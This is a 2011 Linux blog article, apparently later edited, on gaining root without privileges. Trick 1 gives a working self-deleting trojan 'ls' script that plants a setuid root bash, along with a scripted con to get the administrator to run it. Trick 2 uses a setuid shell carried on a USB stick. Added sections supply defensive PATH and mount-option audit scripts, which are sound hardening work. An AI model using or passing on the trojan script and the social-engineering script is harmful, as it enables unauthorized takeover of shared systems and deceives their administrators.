
Howto become root without root privileges in Linux
News - Ubuntu / Linux / Unix
Written by Mark Veenstra
Tuesday, 19 April 2011 11:40

In this article I will show you how to become the root user on a system that isn't maintained that well. If your system administrator isn't lazy, this should already be fixed on your servers. But hey, you can try. I will also show you how to fix this on a Linux system.

Trick 1:

For example, create the following bash script and place it in your home directory, for example as '/home/username/ls':

#!/bin/bash
# Runs with the privileges of whoever executes it. The payload only pays off
# when that is root, which the conversation below arranges. All paths are
# relative, so it also relies on root having done 'cd' into this directory.
cp /bin/bash mybash          # copy the shell into the current directory
chown root:root mybash       # redundant when root made the copy, but harmless
chmod u+s mybash             # set the setuid bit: mybash now runs as its owner
rm ls                        # remove this script so nothing is left to notice
/bin/ls "${@}"               # run the real ls so the output looks normal

Once you have placed this file in your home directory, make it executable:

chmod a+x /home/username/ls

So now you have a script called 'ls'. As you know, 'ls' is also the Linux command that lists directory contents. Now you call your system administrator and play a little game like this:

ROOT > Hi, how can I help you?
YOU > Please help me I have a file I can't remove
ROOT > OK, tell me
YOU > Please do the following: cd /home/username/
YOU > Did you change directory?
ROOT > Yes.
YOU > OK, please do an ls now
ROOT > Done, What file are you talking about?

From this stage on, do as you wish: the moment your system administrator ran 'ls' from inside your home directory, your script was executed instead of /bin/ls (this only works if root's PATH resolves the current directory before /bin; more on that below). The script made a root-owned copy of a shell and set the setuid bit on it. Because of that bit, you can start the shell and become root. Test it for yourself by starting the shell as follows. The -p flag matters: without it bash notices that the effective uid differs from the real uid, drops the privilege and resets the effective uid to your own.

/home/username/mybash -p

As you will notice, you are now root. Type 'id -u', which prints the effective UID: 0. This means you have root privileges now. As I said, this won't work on all systems. It is quite easy to prevent users from doing such things on your system. If you have root access to your system and want to prevent users from pulling this trick on you, make sure that the current directory is not in your PATH environment variable, or at the very least not at the beginning of it. To check this:

root@server ~ # echo $PATH
/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:

The output shown above is acceptable: the current directory is in root's PATH, but at the end (the trailing ':' leaves an empty field after it, and an empty field means the current directory). With the current directory at the end, a planted executable with the same name as a system command is not run, because the real one is found earlier in PATH. So what you must make sure of is that the current directory is not at the beginning. The current directory can appear in PATH as an empty field (a leading or trailing ':', or a '::' in the middle) or as a dot ('.'). Note that a trailing entry is still not harmless: any command name that is mistyped or not installed (think 'sl' instead of 'ls') will resolve to a file of that name in the current directory, so the safest setting for root is no current-directory entry at all.
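The PATH audit below is an added example written for this edit, not code from the original article. It parses a PATH string the way the shell does (an empty field, a lone '.', or any entry not starting with '/' resolves relative to the current directory, and a trailing ':' is an empty field), reports every such entry together with whether it sits before or after the first absolute directory, and offers a sanitize_path helper that drops them. The function names check_path and sanitize_path and the sample PATH strings are my own; the first sample is the root PATH quoted above. Save it as a script and run it with sh, or paste the functions into a shell and call check_path "$PATH".

```sh
#!/bin/sh
# Added example (not from the original article): audit a PATH string for
# entries that resolve relative to the current directory, the weakness Trick 1
# depends on. Function and variable names are the editor's own.
#
# check_path PATHSTRING
#   Prints one line per unsafe entry. Exit status:
#     0  no relative entry at all (recommended for root)
#     1  a relative entry precedes every absolute directory, so a planted
#        ./ls shadows /bin/ls exactly as in Trick 1
#     2  relative entries appear only after absolute directories: a planted
#        ls is not run, but a mistyped or missing command name still is
check_path() {
    rest="$1:"         # trailing sentinel so the last field is processed,
                       # including the empty one left by a trailing ':'
    pos=0
    seen_abs=0
    worst=0
    while [ -n "$rest" ]; do
        entry="${rest%%:*}"
        rest="${rest#*:}"
        pos=$((pos + 1))
        case "$entry" in
            /*) seen_abs=1; continue ;;
            "") printf 'entry %d: empty field (current directory)\n' "$pos" ;;
            *)  printf 'entry %d: relative entry "%s"\n' "$pos" "$entry" ;;
        esac
        # Rank the finding: before any absolute directory is the worst case.
        if [ "$seen_abs" -eq 0 ]; then
            worst=1
        elif [ "$worst" -eq 0 ]; then
            worst=2
        fi
    done
    return "$worst"
}

# sanitize_path PATHSTRING
#   Prints PATHSTRING with every relative entry removed.
sanitize_path() {
    rest="$1:"
    out=""
    while [ -n "$rest" ]; do
        entry="${rest%%:*}"
        rest="${rest#*:}"
        case "$entry" in
            /*) out="${out:+$out:}$entry" ;;   # keep absolute directories only
        esac
    done
    printf '%s\n' "$out"
}

# Constructed sample values (not taken from a real host). The first one is the
# root PATH quoted in the article, trailing ':' included.
for p in '/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:' \
         '.:/usr/local/bin:/usr/bin:/bin' \
         '/usr/local/bin:/usr/bin:/bin'; do
    printf 'PATH=%s\n' "$p"
    rc=0
    check_path "$p" || rc=$?
    if [ "$rc" -eq 0 ]; then
        echo '  verdict: safe, no relative entries'
    else
        echo "  verdict: unsafe (severity $rc)"
    fi
    printf '  sanitized: %s\n\n' "$(sanitize_path "$p")"
done
```

The article's own root PATH comes back with severity 2 (the trailing empty field), a leading '.' or ':' comes back with severity 1, and sanitize_path is what you would put in root's profile to strip such entries before anything else runs.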

Trick 2:

So your system administrator is not lazy :-). Maybe this trick can help you out. Of course this trick also has a fix, but you can give it a try. What you have to do is log into a Linux machine of your own, where you of course have root access. What you do is pretty much the same as in the first trick: you copy a root-owned setuid bash onto a USB stick or CD/DVD. For example:

root@server ~ # cp /bin/bash /mnt/usb/mybash
root@server ~ # chown root:root /mnt/usb/mybash
root@server ~ # chmod u+s /mnt/usb/mybash

Now when you plug this USB stick, CD or DVD into a machine on which you want root privileges, you start your own copy of bash from the mounted medium (again with -p, so bash keeps the setuid privilege) and you have root access there too. Pretty nice, isn't it? But for every problem there is a solution. Of course system administrators can disable mounting of USB, CD or DVD for normal users. But if it is enabled, they should only allow it with the 'nosuid' mount option ('mount -o nosuid,nodev'), which makes the kernel ignore setuid and setgid bits on that filesystem ('nodev' likewise ignores device nodes, which a prepared medium could also carry). Two things to check before relying on this trick: the medium must be formatted with a filesystem that stores Unix ownership and mode bits (ext2/3/4, or ISO 9660 with Rock Ridge extensions; a FAT-formatted stick cannot carry a setuid bit at all), and the desktop automounters of most distributions already mount removable media with nosuid and nodev, so on such a system the copied shell will simply run as you.
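The two checks below are an added example written for this edit, not code from the original article. audit_mounts reads lines in /proc/mounts format and flags removable-media mount points that were mounted without nosuid or nodev, which is the administrator's side of Trick 2; find_setuid lists the setuid files under a directory, which is what a prepared stick looks like once mounted. The function names, the mount-point prefixes it considers removable and the sample mount table are my own assumptions; on a real host you would pipe /proc/mounts into audit_mounts and point find_setuid at the mount point.

```sh
#!/bin/sh
# Added example (not from the original article): two checks for the Trick 2
# fix. audit_mounts reads /proc/mounts-format lines on stdin and reports
# removable-media mount points mounted without nosuid/nodev; find_setuid
# lists setuid files under a directory. Names and sample data are the
# editor's own.

# has_opt OPTIONS NAME -> true if NAME is one of the comma-separated options
has_opt() {
    case ",$1," in
        *",$2,"*) return 0 ;;
    esac
    return 1
}

# audit_mounts < /proc/mounts
#   Flags every mount under /mnt, /media or /run/media lacking nosuid or
#   nodev. Exit status 0 if all such mounts are hardened, 1 otherwise.
audit_mounts() {
    bad=0
    while read -r dev mnt fstype opts rest; do
        case "$mnt" in
            /mnt/*|/media/*|/run/media/*) ;;
            *) continue ;;          # not removable media, out of scope here
        esac
        missing=""
        has_opt "$opts" nosuid || missing="$missing nosuid"
        has_opt "$opts" nodev  || missing="$missing nodev"
        if [ -n "$missing" ]; then
            printf '%s (%s on %s) lacks:%s\n' "$mnt" "$fstype" "$dev" "$missing"
            bad=1
        fi
    done
    return "$bad"
}

# find_setuid DIR -> paths of regular files with the setuid bit under DIR,
# staying on one filesystem so a scan of /mnt/usb does not wander elsewhere
find_setuid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null
}

# Constructed /proc/mounts-style sample (not captured from a real host):
# /mnt/usb was mounted by hand without options; the two /media entries carry
# the nosuid,nodev that desktop automounters typically apply.
SAMPLE_MOUNTS='/dev/sda1 / ext4 rw,relatime,errors=remount-ro 0 0
/dev/sdb1 /mnt/usb ext3 rw,relatime 0 0
/dev/sdc1 /media/user/STICK vfat rw,nosuid,nodev,relatime,uid=1000,gid=1000 0 0
/dev/sr0 /media/cdrom iso9660 ro,nosuid,nodev,relatime 0 0'

printf '%s\n' "$SAMPLE_MOUNTS" | audit_mounts \
    || echo 'fix the flagged entries with: mount -o remount,nosuid,nodev <mountpoint>'
```

With the sample table only /mnt/usb is reported, lacking both options; the vfat stick under /media would not be able to carry a setuid bit anyway, but the check is about the mount options, not the filesystem, because an ext3 stick mounted the same careless way would.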



Last Updated on Tuesday, 19 April 2011 18:23
Comments 

#1 Jonathan Zerox 2012-08-09 18:15
Thank you man for this trick. I tried it out and it worked perfectly. Thanks a lot.